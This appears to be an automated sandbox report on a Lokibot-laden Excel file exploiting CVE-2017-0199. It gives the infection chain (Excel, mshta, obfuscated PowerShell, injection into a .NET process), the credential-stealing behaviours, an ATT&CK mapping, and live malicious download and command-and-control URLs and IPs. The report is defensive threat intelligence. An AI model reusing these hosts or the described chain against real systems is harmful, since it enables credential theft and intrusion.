          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001

          Remote Access Functionality

          barindex
          Yara detected Lokibot
          Source: Yara matchFile source: dump.pcap, type: PCAP

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information121
          Scripting          		Valid Accounts23
          Exploitation for Client Execution          		121
          Scripting          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		2
          OS Credential Dumping          		1
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		5
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts121
          Command and Scripting Interpreter          		1
          DLL Side-Loading          		211
          Process Injection          		11
          Obfuscated Files or Information          		1
          Credentials in Registry          		14
          System Information Discovery          		Remote Desktop Protocol1
          Browser Session Hijacking          		11
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts3
          PowerShell          		Logon Script (Windows)Logon Script (Windows)1
          Install Root Certificate          		Security Account Manager1
          Security Software Discovery          		SMB/Windows Admin Shares2
          Data from Local System          		4
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          DLL Side-Loading          		NTDS1
          Process Discovery          		Distributed Component Object Model11
          Email Collection          		15
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Masquerading          		LSA Secrets21
          Virtualization/Sandbox Evasion          		SSH1
          Clipboard Data          		Fallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
          Virtualization/Sandbox Evasion          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
          Process Injection          		DCSync1
          Remote System Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1545131 Sample: PO.2407010.xls Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 91 Suricata IDS alerts for network traffic 2->91 93 Malicious sample detected (through community Yara rule) 2->93 95 Yara detected HtmlPhish44 2->95 97 17 other signatures 2->97 11 EXCEL.EXE 57 29 2->11         started        process3 dnsIp4 85 198.46.178.151, 49164, 49166, 49167 AS-COLOCROSSINGUS United States 11->85 87 acesso.run 172.67.162.95, 443, 49163, 49170 CLOUDFLARENETUS United States 11->87 69 C:\Users\user\Desktop\PO.2407010.xls (copy), Composite 11->69 dropped 71 C:\Users\...\greatthingswithmegood[1].hta, HTML 11->71 dropped 129 Microsoft Office drops suspicious files 11->129 16 mshta.exe 10 11->16         started        20 mshta.exe 10 11->20         started        file5 signatures6 process7 dnsIp8 73 104.21.74.191, 443, 49165 CLOUDFLARENETUS United States 16->73 75 acesso.run 16->75 89 Suspicious powershell command line found 16->89 22 powershell.exe 24 16->22         started        77 acesso.run 20->77 26 powershell.exe 20->26         started        signatures9 process10 file11 65 seemethebestthings...reatneedswithgo.vbs, Unicode 22->65 dropped 67 C:\Users\user\AppData\...\brij5btb.cmdline, Unicode 22->67 dropped 103 Suspicious powershell command line found 22->103 105 Obfuscated command line found 22->105 28 wscript.exe 1 22->28         started        31 powershell.exe 4 22->31         started        33 csc.exe 2 22->33         started        36 wscript.exe 26->36         started        38 csc.exe 26->38         started        40 powershell.exe 26->40         started        signatures12 process13 file14 119 Suspicious powershell command line found 28->119 121 Wscript starts Powershell (via cmd or directly) 28->121 123 Bypasses PowerShell execution policy 28->123 127 2 other signatures 28->127 42 powershell.exe 2 28->42         started        125 Installs new ROOT certificates 31->125 61 C:\Users\user\AppData\Local\...\brij5btb.dll, PE32 33->61 dropped 45 cvtres.exe 33->45         started        47 powershell.exe 36->47         started        63 C:\Users\user\AppData\Local\...\jk3wn0wt.dll, PE32 38->63 dropped 49 cvtres.exe 38->49         started        signatures15 process16 signatures17 107 Suspicious powershell command line found 42->107 109 Obfuscated command line found 42->109 51 powershell.exe 12 4 42->51         started        55 powershell.exe 47->55         started        process18 dnsIp19 79 drive.google.com 142.250.186.46, 443, 49168, 49175 GOOGLEUS United States 51->79 81 drive.usercontent.google.com 172.217.16.193, 443, 49169, 49176 GOOGLEUS United States 51->81 99 Writes to foreign memory regions 51->99 101 Injects a PE file into a foreign processes 51->101 57 aspnet_regbrowsers.exe 51->57         started        signatures20 process21 dnsIp22 83 94.156.177.220, 49178, 49179, 49180 NET1-ASBG Bulgaria 57->83 111 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 57->111 113 Tries to steal Mail credentials (via file / registry access) 57->113 115 Tries to harvest and steal ftp login credentials 57->115 117 Tries to harvest and steal browser information (history, passwords, etc) 57->117 signatures23

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO.2407010.xls11%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
          PO.2407010.xls100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          http://crl.entrust.net/server1.crl00%URL Reputationsafe
          http://ocsp.entrust.net030%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
          http://go.micros0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          http://ocsp.entrust.net0D0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          https://secure.comodo.com/CPS00%URL Reputationsafe
          http://crl.entrust.net/2048ca.crl00%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          acesso.run
          		172.67.162.95
          		truefalse
            		unknown
            drive.google.com
            		142.250.186.46
            		truefalse
              		unknown
              drive.usercontent.google.com
              		172.217.16.193
              		truefalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://198.46.178.151/66/seemethebestthingswithgreatneedswithgoodformewith.tIFtrue
                  		unknown
                  http://198.46.178.151/66/LLORG.txttrue
                    		unknown
                    http://94.156.177.220/logs/five/fre.phptrue
                      		unknown
                      http://198.46.178.151/66/gb/greatthingswithmegood.htatrue
                        		unknown
                        https://acesso.run/ll2rdE?&moustache=historical&spade=lonely&fatherfalse
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://198.46.178.151/66/gb/greatthingswithmegood.htahttp://198.46.178.151/66/gb/greatthingswithmegomshta.exe, 00000004.00000003.431292815.0000000001F25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475849306.0000000002095000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.472442251.0000000002095000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.460380386.0000000012201000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://198.46.178.151/66/gb/greatthingswithmegood.hta5KWWSmshta.exe, 0000000F.00000002.477269277.0000000004D30000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://acesso.run/ll2rdE?&moustache=historical&spade=lonely&fathertmshta.exe, 00000004.00000002.432507010.000000000044F000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000002.433099624.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430875970.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://acesso.run/ll2rdE?&moustache=historical&spade=lonely&fatherF#mshta.exe, 0000000F.00000002.476744420.00000000003FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://198.46.178.151/66/gb/greatthingswithmegood.hta.eXEmshta.exe, 0000000F.00000002.476744420.00000000003FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://ocsp.entrust.net03mshta.exe, 00000004.00000002.433099624.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430875970.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://198.46.178.151/66/gb/greatthingswithmegood.htaC:mshta.exe, 00000004.00000002.433061413.000000000310B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://contoso.com/Licensepowershell.exe, 00000005.00000002.460380386.0000000012201000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://contoso.com/Iconpowershell.exe, 00000005.00000002.460380386.0000000012201000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://198.46.178.151/66/seemethebestthingswithgreatneedswithgoodformewith.tIFppowershell.exe, 00000005.00000002.457385625.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.484734219.0000000002679000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://198.46.178.151/66/gb/greatthingswithmegood.htaly&fathermshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://198.46.178.151/66/gb/greatthingswithmegood.hta/mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://198.46.178.151/66/gb/greatthingswithmegood.htalonely&fathermshta.exe, 00000004.00000002.432507010.000000000044F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476744420.00000000003FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://198.46.178.151/66/gb/greatthingswithmegood.hta...mshta.exe, 0000000F.00000002.476744420.00000000003FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://go.microspowershell.exe, 00000005.00000002.457385625.000000000358E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://198.46.178.151/66/seemethebestthingswithgreatneedswithgoodformewith.tIFC:powershell.exe, 00000011.00000002.491490511.000000001A8FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://198.46.178.151/mshta.exe, 00000004.00000003.431360053.0000000003168000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003168000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003168000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.0000000003168000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430875970.0000000003168000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.00000000035B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.00000000035B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.00000000035B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://198.46.178.151/cmshta.exe, 0000000F.00000002.476996114.00000000035B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.00000000035B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.00000000035B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://acesso.run/ll2rdE?&moustache=historical&spade=lonely&fatherWmshta.exe, 0000000F.00000003.470008641.0000000000465000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://198.46.178.151/66/gb/greatthingswithmegood.hta...3mshta.exe, 00000004.00000002.432507010.000000000044F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://contoso.com/powershell.exe, 00000005.00000002.460380386.0000000012201000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.460380386.0000000012201000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://acesso.run/6mshta.exe, 0000000F.00000003.470008641.00000000004AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476212495.00000000004AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476765647.00000000004AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://drive.google.compowershell.exe, 0000000E.00000002.511359477.0000000002732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.545987479.0000000002662000.00000004.00000800.00020000.00000000.sdmptrue
                                                                  		unknown
                                                                  https://drive.usercontent.google.compowershell.exe, 0000000E.00000002.511359477.00000000028F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.545987479.0000000002827000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://acesso.run/mshta.exe, 00000004.00000002.433099624.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433061413.000000000310B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430875970.0000000003143000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470008641.00000000004AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476212495.00000000004AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476765647.00000000004AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.457385625.00000000021D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.511359477.0000000002531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.484734219.00000000020B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.545987479.0000000002461000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://acesso.run/_mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.430875970.000000000311E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431360053.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.430732621.000000000311D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431053039.0000000003121000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433099624.0000000003122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476162627.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.476996114.0000000003568000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.474029170.0000000003568000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://198.46.178.151/66/gb/greatthingswithmegood.htalonely&fathersmshta.exe, 0000000F.00000002.476744420.00000000003FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://198.46.178.151/66/seemethpowershell.exe, 00000005.00000002.457385625.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.484734219.0000000002679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://acesso.run/ll2rdE?&moustache=historical&spade=lonely&fathermmshta.exe, 00000004.00000002.432507010.000000000044F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              172.67.162.95
                                                                              		acesso.runUnited States
                                                                              		13335CLOUDFLARENETUSfalse
                                                                              142.250.186.46
                                                                              		drive.google.comUnited States
                                                                              		15169GOOGLEUSfalse
                                                                              104.21.74.191
                                                                              		unknownUnited States
                                                                              		13335CLOUDFLARENETUSfalse
                                                                              94.156.177.220
                                                                              		unknownBulgaria
                                                                              		43561NET1-ASBGtrue
                                                                              198.46.178.151
                                                                              		unknownUnited States
                                                                              		36352AS-COLOCROSSINGUStrue
                                                                              172.217.16.193
                                                                              		drive.usercontent.google.comUnited States
                                                                              		15169GOOGLEUSfalse

                                                                              General Information

                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1545131
                                                                              Start date and time:2024-10-30 08:02:58 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 7m 31s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                              Number of analysed new started processes analysed:30
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • GSI enabled (VBA)
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Sample name:PO.2407010.xls
                                                                              Detection:MAL
                                                                              Classification:mal100.phis.troj.spyw.expl.evad.winXLS@34/43@8/6
